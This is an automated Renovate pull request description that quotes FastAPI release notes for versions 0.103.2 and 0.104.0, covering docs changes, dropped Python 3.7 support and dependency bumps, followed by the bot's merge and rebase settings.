• 🐛 Fix overriding MKDocs theme lang in hook. PR #​10490 by @​tiangolo.
• 🔥 Drop/close Gitter chat. Questions should go to GitHub Discussions, free conversations to Discord.. PR #​10485 by @​tiangolo.

v0.104.0

Compare Source

Features

• ✨ Add reference (code API) docs with PEP 727, add subclass with custom docstrings for BackgroundTasks, refactor docs structure. PR #​10392 by @​tiangolo. New docs at FastAPI Reference - Code API.

Upgrades

• ⬆️ Drop support for Python 3.7, require Python 3.8 or above. PR #​10442 by @​tiangolo.

Internal

• ⬆ Bump dawidd6/action-download-artifact from 2.27.0 to 2.28.0. PR #​10268 by @​dependabot[bot].
• ⬆ Bump actions/checkout from 3 to 4. PR #​10208 by @​dependabot[bot].
• ⬆ Bump pypa/gh-action-pypi-publish from 1.8.6 to 1.8.10. PR #​10061 by @​dependabot[bot].
• 🔧 Update sponsors, Bump.sh images. PR #​10381 by @​tiangolo.
• 👥 Update FastAPI People. PR #​10363 by @​tiangolo.

v0.103.2

Compare Source

Refactors

• ⬆️ Upgrade compatibility with Pydantic v2.4, new renamed functions and JSON Schema input/output models with default values. PR #​10344 by @​tiangolo.

Translations

• 🌐 Ad

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.